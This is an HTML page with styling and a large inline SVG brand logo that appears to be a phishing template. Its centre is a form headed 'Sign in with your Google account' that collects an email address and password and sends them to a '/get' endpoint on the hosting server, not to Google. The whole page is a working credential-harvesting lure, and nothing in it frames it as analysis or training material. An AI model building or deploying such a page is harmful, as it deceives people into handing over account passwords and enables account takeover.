<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FFC72C;
  margin-right: 100px
}

.brand-name {
  font-size: 42px;
  color: #6245BB;
  margin-left: 10px;
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #6245BB;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #6245BB;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #6245BB;
}


</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<?xml version="1.0" encoding="UTF-8"?>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="384.000000pt" height="216.000000pt" viewBox="0 0 3840.000000 2160.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,2160.000000) scale(0.100000,-0.100000)"
fill="#6245BB" stroke="none">
<path d="M0 10800 l0 -10800 19200 0 19200 0 0 10800 0 10800 -19200 0 -19200
0 0 -10800z m7629 4835 c134 -28 253 -85 351 -168 83 -71 1573 -1561 1618
-1618 173 -221 218 -471 121 -676 -59 -125 -187 -230 -334 -275 -80 -24 -273
-30 -335 -10 -19 6 -46 14 -60 16 -84 17 -295 133 -367 202 -11 11 -132 127
-269 259 -137 132 -316 306 -399 386 -310 302 -418 405 -445 422 -41 26 -109
29 -160 6 -43 -19 -168 -121 -371 -300 -522 -463 -737 -651 -837 -734 -98 -81
-125 -128 -125 -220 0 -98 28 -147 157 -272 55 -54 306 -298 556 -543 250
-245 563 -551 695 -680 132 -129 320 -313 419 -409 277 -272 384 -416 464
-626 45 -119 64 -224 64 -355 1 -189 -38 -342 -136 -545 -154 -316 -366 -566
-922 -1093 -181 -172 -213 -214 -210 -274 6 -81 -40 -48 964 -678 804 -504
844 -532 947 -657 111 -135 166 -292 160 -458 -4 -105 -8 -125 -41 -218 -78
-225 -285 -419 -484 -456 -52 -9 -252 -8 -295 2 -110 26 -238 73 -340 124 -74
37 -111 58 -1213 699 -182 107 -336 194 -341 194 -5 0 -11 4 -13 8 -1 4 -115
73 -253 152 -432 249 -486 284 -592 389 -111 110 -190 236 -224 361 -14 50
-17 95 -15 195 1 72 8 141 13 155 6 14 21 52 34 85 24 63 85 175 116 212 10
12 29 36 43 54 55 71 263 272 405 390 191 160 353 285 620 478 457 332 552
407 690 545 155 155 190 238 143 331 -22 43 -150 175 -233 241 -27 21 -52 41
-55 44 -3 3 -30 24 -60 48 -30 23 -59 45 -65 50 -35 28 -265 199 -340 252 -49
36 -92 67 -95 71 -3 3 -144 105 -315 227 -170 122 -314 226 -320 230 -5 4 -73
52 -150 106 -77 55 -158 112 -180 128 -168 123 -527 373 -559 390 -22 11 -64
22 -96 23 -96 6 -160 -35 -262 -165 -336 -433 -754 -909 -1102 -1255 -377
-376 -542 -495 -741 -534 -234 -46 -483 23 -648 178 -223 210 -1550 1541
-1591 1596 -72 95 -110 165 -141 260 -124 370 134 716 535 717 175 0 337 -56
495 -171 39 -28 317 -295 619 -594 301 -298 562 -550 579 -559 54 -30 128 -24
211 18 242 123 662 395 991 642 137 103 440 344 460 366 6 6 41 38 80 71 38
33 75 65 81 70 6 6 60 55 120 110 115 105 358 346 409 405 124 144 166 192
205 239 25 29 52 62 62 73 9 10 31 37 50 60 18 23 38 46 43 52 6 6 37 45 70
86 33 41 65 80 70 86 6 6 24 28 40 48 17 21 37 46 45 56 45 54 162 201 200
250 14 18 33 42 44 54 10 11 30 37 45 56 14 19 32 41 38 48 7 7 34 41 60 75
26 34 52 67 58 74 5 6 20 24 32 40 12 15 30 38 40 50 10 12 27 33 37 48 16 21
81 103 209 265 7 8 26 33 42 55 16 22 33 42 36 45 6 5 47 57 132 170 23 30 52
66 65 80 12 14 22 28 22 31 0 3 9 17 21 30 40 48 54 65 83 104 17 22 33 42 36
45 3 3 17 21 30 40 13 19 27 37 30 40 3 3 36 45 74 93 104 134 195 198 341
237 81 22 223 24 314 5z m-3619 -525 c507 -103 870 -543 873 -1058 1 -216 -58
-417 -178 -604 -63 -98 -229 -261 -329 -323 -84 -52 -246 -122 -305 -131 -20
-3 -39 -8 -43 -11 -20 -11 -116 -18 -253 -17 -128 1 -164 5 -248 28 -328 87
-603 322 -726 620 -38 91 -59 156 -67 206 -3 19 -9 51 -14 72 -14 67 -12 243
5 334 85 453 406 785 855 884 115 25 305 25 430 0z m25045 -441 c81 -16 207
-77 281 -138 102 -83 172 -188 427 -641 11 -19 202 -359 425 -755 223 -396
426 -757 451 -802 25 -46 49 -83 53 -83 3 0 20 25 38 56 36 64 270 483 405
724 483 865 667 1190 722 1275 172 263 383 386 642 373 164 -9 290 -66 412
-189 101 -100 162 -235 188 -419 6 -38 10 -607 10 -1358 l1 -1292 -397 2 -398
3 -5 1030 c-3 567 -8 1026 -11 1020 -4 -5 -21 -37 -39 -70 -18 -33 -107 -193
-198 -355 -90 -162 -221 -396 -290 -520 -411 -739 -444 -792 -562 -910 -83
-83 -165 -136 -268 -174 -89 -32 -120 -38 -222 -42 -141 -5 -289 33 -410 106
-90 54 -142 102 -215 195 -77 101 -118 168 -295 485 -79 140 -259 464 -402
719 -142 255 -270 486 -284 512 -13 27 -29 49 -34 49 -7 0 -10 -360 -10 -1025
l0 -1025 -397 2 -398 3 -2 165 c-7 690 -8 2295 -1 2380 26 303 132 503 330
623 135 82 292 108 453 76z m-16348 -10 c92 -24 136 -44 213 -94 76 -49 159
-129 206 -200 27 -40 474 -947 829 -1680 35 -71 187 -384 339 -694 152 -310
276 -566 276 -568 0 -7 -875 -2 -885 5 -6 4 -28 43 -50 87 -56 116 -241 495
-367 755 -61 124 -134 275 -163 335 -29 61 -124 256 -212 435 -87 179 -204
418 -258 532 -55 115 -103 207 -107 205 -10 -3 -418 -835 -418 -851 0 -10 44
-12 180 -11 99 0 185 -2 190 -5 9 -6 389 -762 393 -783 1 -4 -261 -9 -582 -10
l-584 -2 -81 -170 c-109 -230 -183 -387 -218 -462 l-28 -63 -445 0 c-245 0
-445 2 -445 4 0 2 59 125 131 272 72 148 171 350 219 449 48 99 140 288 205
420 65 132 150 308 190 390 40 83 121 249 180 370 109 224 179 367 369 760
131 269 151 302 240 391 97 96 207 157 346 189 81 20 255 16 337 -6z m2935 -1
c112 -30 203 -83 289 -168 41 -41 354 -390 694 -775 341 -385 739 -834 885
-998 l265 -299 3 1121 2 1121 400 0 400 0 0 -1332 c-1 -1264 -2 -1337 -19
-1412 -57 -238 -227 -424 -461 -502 -85 -28 -282 -26 -374 5 -149 48 -236 110
-359 250 -81 93 -167 190 -402 456 -699 788 -889 1002 -945 1065 -141 158
-317 357 -360 408 -25 28 -48 52 -52 52 -5 0 -8 -502 -8 -1115 l0 -1115 -400
0 -400 0 0 1318 c1 853 5 1336 11 1372 16 86 57 200 95 262 84 139 274 271
422 294 21 3 39 8 42 10 12 13 207 0 272 -18z m4430 -215 c106 -120 197 -223
203 -229 5 -6 122 -138 260 -293 l250 -283 35 39 c31 34 134 150 182 205 9 11
48 54 85 96 37 41 75 83 83 92 31 35 126 144 143 164 10 12 45 50 77 86 32 36
67 74 77 86 52 60 143 163 182 206 l43 48 530 0 c328 0 528 -4 526 -9 -2 -8
-240 -281 -283 -325 -6 -6 -91 -103 -190 -215 -99 -112 -240 -272 -314 -355
-73 -83 -211 -239 -306 -346 -95 -107 -238 -269 -319 -360 l-146 -165 0 -732
0 -733 -400 0 -400 0 0 730 0 731 -47 52 c-27 28 -52 57 -58 63 -5 6 -23 27
-40 45 -58 67 -180 204 -190 215 -10 11 -67 75 -379 428 -93 105 -185 209
-205 231 -20 22 -70 78 -111 125 -41 47 -77 87 -80 90 -3 3 -57 64 -120 135
-119 136 -226 256 -297 335 -24 26 -43 50 -43 54 0 3 238 6 529 6 l530 0 193
-217z m6346 -185 l2 -398 -645 0 -645 0 0 -1220 0 -1220 -402 2 -403 3 0 1215
0 1215 -665 5 -665 5 -1 390 c0 215 1 393 3 398 3 4 772 6 1711 5 l1707 -3 3
-397z m1332 -1218 l0 -1620 -400 0 -400 0 0 1620 0 1620 400 0 400 0 0 -1620z
m9474 1612 c6 -10 10 -781 4 -787 -2 -3 -605 -5 -1339 -5 -1461 -1 -1374 3
-1420 -61 -23 -32 -24 -41 -24 -194 l0 -160 1393 -3 1392 -2 1 -338 c1 -185 1
-364 2 -397 l0 -60 -1389 -2 c-764 -2 -1392 -3 -1396 -3 -4 0 -7 -67 -6 -149
1 -167 13 -214 64 -248 27 -17 89 -18 1372 -20 740 -1 1346 -4 1348 -5 1 -2 4
-181 6 -398 l2 -395 -1469 0 c-809 0 -1492 3 -1520 8 -136 20 -199 45 -310
120 -96 65 -174 159 -224 268 -63 140 -60 83 -61 1219 0 1011 0 1037 20 1108
52 187 162 328 330 425 53 30 155 66 213 74 23 3 44 7 46 9 9 8 2960 4 2965
-4z m-16103 -4277 c35 -9 89 -29 121 -45 123 -61 139 -77 617 -620 85 -96 205
-231 266 -300 62 -69 222 -249 356 -401 641 -724 771 -869 777 -869 4 0 7 502
7 1115 l0 1115 82 1 c46 0 124 0 173 0 50 0 192 0 318 0 l227 -1 -1 -1332 c-1
-733 -4 -1348 -8 -1365 -14 -69 -57 -190 -86 -240 -36 -63 -129 -164 -187
-204 -63 -44 -150 -85 -214 -102 -81 -21 -243 -22 -326 -1 -136 33 -275 119
-363 225 -24 30 -65 77 -91 104 -26 28 -100 111 -165 186 -66 75 -173 196
-239 270 -230 258 -421 474 -539 608 -65 75 -139 159 -165 186 -25 28 -80 88
-121 135 -41 47 -77 87 -80 90 -3 3 -34 39 -70 80 -36 41 -69 80 -75 86 -58
62 -164 182 -193 218 -20 25 -41 46 -47 46 -7 0 -10 -374 -10 -1103 l0 -1102
-395 -1 c-217 -1 -397 2 -400 7 -3 4 -5 598 -4 1321 1 1422 -2 1351 53 1499
27 72 99 179 159 236 162 153 403 215 623 158z m-1461 -396 l0 -399 -645 0
-645 0 0 -1213 0 -1213 -400 0 c-281 -1 -400 3 -400 10 0 6 0 552 0 1213 l0
1203 -667 2 -668 3 -3 397 -3 398 1703 2 c937 2 1709 1 1716 -1 9 -2 12 -91
12 -402z m-5600 1 l0 -400 -1335 0 c-1475 0 -1374 5 -1415 -63 -18 -28 -20
-51 -20 -194 l0 -163 1385 0 1385 0 0 -400 0 -400 -1385 0 -1385 0 0 -603 0
-602 -400 -1 -401 0 3 1336 3 1335 27 78 c50 149 149 279 274 362 70 47 126
71 216 95 70 18 132 19 1561 19 l1487 1 0 -400z m1543 388 c-2 -5 -3 -730 -3
-1612 l0 -1603 -397 1 -398 1 -3 1613 -2 1612 402 -2 c222 -2 402 -6 401 -10z
m12752 -388 l0 -400 -1345 0 c-1316 0 -1346 0 -1377 -20 -57 -34 -64 -61 -61
-237 l3 -158 1380 -2 c759 -1 1385 -2 1390 -2 6 -1 10 -141 10 -399 l0 -397
-1390 -2 -1390 -3 0 -171 0 -171 37 -34 38 -34 1370 0 1370 0 0 -400 0 -400
-1532 3 c-843 1 -1543 5 -1556 9 -91 27 -212 85 -266 128 -101 78 -190 207
-234 337 l-27 78 0 1060 0 1060 28 80 c66 194 192 334 373 416 131 59 59 57
1684 58 l1495 1 0 -400z m4445 0 l1 -400 -1368 -1 c-752 0 -1381 -3 -1397 -5
-100 -17 -180 -125 -169 -228 5 -47 22 -83 59 -120 66 -65 -12 -61 1079 -63
545 -1 1024 -4 1065 -7 93 -6 249 -54 347 -106 282 -151 467 -404 528 -724 24
-125 18 -254 -19 -434 -21 -98 -107 -264 -193 -371 -130 -163 -361 -309 -549
-347 -99 -20 -300 -23 -1564 -23 l-1415 -1 0 397 0 398 1410 5 c1287 5 1413 6
1440 22 144 79 142 293 -4 368 -37 18 -73 19 -1067 23 -566 2 -1040 6 -1054
10 -13 4 -41 9 -62 12 -152 23 -375 142 -501 267 -367 367 -396 969 -67 1362
157 187 389 317 640 359 14 2 663 5 1442 6 l1417 1 1 -400z m4431 118 c1 -156
2 -334 2 -396 1 -63 -1 -116 -4 -118 -4 -2 -625 -4 -1380 -4 -1137 -1 -1381
-3 -1413 -15 -107 -38 -169 -180 -121 -276 28 -55 76 -98 126 -113 38 -12 226
-14 1045 -14 549 0 1019 -3 1044 -7 132 -18 302 -86 421 -165 82 -56 213 -187
269 -269 55 -82 102 -186 136 -297 24 -79 27 -106 28 -249 1 -215 -17 -306
-94 -463 -128 -258 -342 -436 -639 -529 l-86 -28 -1462 -3 -1463 -3 0 401 0
400 1389 0 c764 0 1403 3 1422 7 47 9 124 89 139 143 13 48 8 107 -14 147 -19
37 -75 89 -108 102 -18 7 -380 11 -1037 11 -555 1 -1027 6 -1048 10 -21 5 -58
12 -83 15 -65 9 -223 71 -305 118 -38 22 -72 43 -75 47 -3 3 -16 14 -30 23
-54 37 -164 156 -215 232 -66 99 -114 210 -146 335 -30 120 -33 324 -6 435 49
206 149 389 285 519 146 140 367 252 536 272 28 4 53 8 55 10 2 2 640 4 1418
4 l1413 0 1 -282z m692 -2406 c25 -11 64 -39 87 -62 112 -112 113 -298 2 -413
-62 -65 -104 -81 -207 -82 -81 0 -95 3 -144 30 -65 36 -105 83 -131 153 -91
243 156 479 393 374z"/>
<path d="M37703 7629 c-182 -91 -165 -364 26 -428 115 -38 260 35 291 148 24
88 2 187 -53 239 -65 61 -187 80 -264 41z m183 -54 c24 -10 39 -26 50 -50 19
-45 10 -83 -28 -116 l-30 -25 36 -47 c20 -26 36 -52 36 -57 0 -6 -16 -10 -35
-10 -29 0 -38 6 -66 48 -38 55 -46 62 -76 62 -19 0 -22 -6 -25 -52 -3 -47 -6
-53 -27 -56 -13 -2 -27 0 -32 5 -10 10 -14 287 -4 303 10 16 161 12 201 -5z"/>
</g>
</svg>






  </div>

  <div class="form-container">

    <center><h1>Sign in with your <font color="#4285F4">G</font><font color="#EA4335">o</font><font color="#FBBC05">o</font><font color="#4285F4">g</font><font color="#34A853">l</font><font color="#EA4335">e</font>
 account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">Continue</button>

    </form>

  </div>

</div>
</body>
</html>
